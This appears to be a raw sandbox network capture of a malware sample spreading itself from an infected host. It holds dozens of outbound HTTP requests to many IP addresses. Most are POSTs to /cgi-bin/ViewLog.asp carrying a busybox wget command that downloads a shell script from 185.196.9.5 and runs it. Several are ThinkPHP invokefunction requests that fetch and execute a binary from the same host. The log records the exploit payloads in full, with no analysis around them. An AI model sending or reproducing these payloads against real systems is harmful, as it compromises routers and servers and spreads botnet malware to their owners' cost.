Feb 25, 2024 19:04:20.808355093 CET	406	IN	HTTP/1.1 302 Found Connection: close Content-Type: text/html X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Location: https://185.196.9.5:80/cgi-bin/ViewLog.asp Content-Length: 169 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0d 0a 3c 54 49 54 4c 45 3e 33 30 32 20 46 6f 75 6e 64 20 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0d 0a 3c 48 31 3e 54 68 65 20 44 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 3c 2f 48 31 3e 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><HTML><HEAD><TITLE>302 Found </TITLE></HEAD><BODY><H1>The Document has moved</H1></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
783	192.168.2.15	49816	95.181.233.144	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:20.118963957 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
784	192.168.2.15	38256	94.122.232.238	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:20.140558958 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
785	192.168.2.15	47522	62.248.133.166	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:20.155642986 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
786	192.168.2.15	54126	94.121.39.159	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:20.316895008 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
787	192.168.2.15	43294	112.12.91.215	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:21.998171091 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:22.392378092 CET	315	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Sun, 25 Feb 2024 18:04:22 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
788	192.168.2.15	43292	112.12.91.215	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:21.999636889 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:22.392113924 CET	315	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Sun, 25 Feb 2024 18:04:22 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
789	192.168.2.15	53956	112.74.74.203	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:22.315063953 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:22.631663084 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:04:22 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
790	192.168.2.15	36510	112.48.157.226	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:22.390206099 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
791	192.168.2.15	40374	31.136.90.43	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:22.756556988 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:25.829655886 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:31.973591089 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:44.005338907 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:09.093031883 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
792	192.168.2.15	42602	62.240.132.159	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:22.760474920 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:22.950859070 CET	305	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:04:22 GMT Server: Apache Content-Length: 127 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 27 2b 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2b 27 3a 27 2b 6c 6f 63 61 74 69 6f 6e 2e 70 6f 72 74 27 3b 3c 2f 73 63 72 69 70 74 3e 3c 68 31 3e 45 72 72 6f 72 20 34 30 30 20 2d 20 74 72 79 69 6e 67 20 74 6f 20 72 65 64 69 72 65 63 74 3c 2f 68 31 3e Data Ascii: <script>document.location.href='https://'+location.hostname+':'+location.port';</script><h1>Error 400 - trying to redirect</h1>

Session ID	Source IP	Source Port	Destination IP	Destination Port
793	192.168.2.15	59428	94.187.112.254	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:22.783266068 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
794	192.168.2.15	47130	94.120.62.243	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:22.790970087 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
795	192.168.2.15	48146	62.29.4.59	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:22.791063070 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
796	192.168.2.15	37060	94.123.11.195	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:22.795022011 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
797	192.168.2.15	33732	31.136.129.160	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:22.937918901 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:23.493514061 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:24.613405943 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:26.853508949 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:31.461347103 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:40.421269894 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:58.853068113 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:35.716638088 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
798	192.168.2.15	48220	31.200.110.237	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:23.016489983 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
799	192.168.2.15	44336	62.29.80.90	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:23.020592928 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
800	192.168.2.15	47102	94.121.106.228	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:23.021670103 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
801	192.168.2.15	36850	31.0.135.230	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:23.160900116 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
802	192.168.2.15	49346	85.122.216.201	8080

Timestamp	Bytes transferred	Direction	Data
